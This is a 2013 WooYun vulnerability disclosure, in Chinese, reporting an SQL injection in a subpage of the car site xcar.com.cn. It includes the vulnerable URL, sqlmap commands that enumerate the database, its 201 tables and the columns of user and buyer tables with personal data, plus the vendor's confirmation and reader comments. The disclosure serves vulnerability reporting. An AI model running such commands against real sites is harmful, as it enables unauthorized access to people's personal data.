当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036993

漏洞标题:爱卡汽车某分站SQL注入漏洞一枚

相关厂商:爱卡汽车网

漏洞作者: leaf

提交时间:2013-09-13 14:01

修复时间:2013-10-28 14:02

公开时间:2013-10-28 14:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-13: 细节已通知厂商并且等待厂商处理中
2013-09-16: 厂商已经确认,细节仅向厂商公开
2013-09-26: 细节向核心白帽子及相关领域专家公开
2013-10-06: 细节向普通白帽子公开
2013-10-16: 细节向实习白帽子公开
2013-10-28: 细节向公众公开

简要描述:

爱卡汽车某站SQL注入漏洞修补不完善,泄漏部分敏感信息!

详细说明:

漏洞链接:

http://topic.xcar.com.cn/201005/dh/zp.php?page=3&sort_id=4


当前用户和当前数据库:

./sqlmap.py -u "http://topic.xcar.com.cn/201005/dh/zp.php?page=3&sort_id=4" --current-user --current-db


333.jpg


当前数据库的所有表(201张表):

./sqlmap.py -u "http://topic.xcar.com.cn/201005/dh/zp.php?page=3&sort_id=4" --tables -D "xcardb2"


111.jpg


其中,"xcar_sale_buyer"表的所有列,包括了姓名、电话、邮件等信息:

./sqlmap.py -u "http://topic.xcar.com.cn/201005/dh/zp.php?page=3&sort_id=4" --columns -T "xcar_sale_buyer" -D "xcardb2"


222.jpg


"xcar_topic_login_user"表的所有列:

./sqlmap.py -u "http://topic.xcar.com.cn/201005/dh/zp.php?page=3&sort_id=4" --columns -T "xcar_topic_login_user" -D "xcardb2"


111.jpg


...
...
...
and so on !!!
目标响应较慢,未进一步深入!

漏洞证明:

如上所述!

修复方案:

null

版权声明:转载请注明来源 leaf@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-09-16 19:43

厂商回复:

感谢白帽子@leaf的帮助,我们会尽快修复!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-09-13 14:14 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    MARK

  2. 2013-09-13 14:51 | g00 ( 路人 | Rank:0 漏洞数:1 | 终于进来了~)

    我多么希望这个洞不要发出来~

  3. 2013-09-13 16:53 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    欢迎基友回归。

  4. 2013-09-13 17:00 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @小胖子 眨眼间,你飞一般的上去鸟...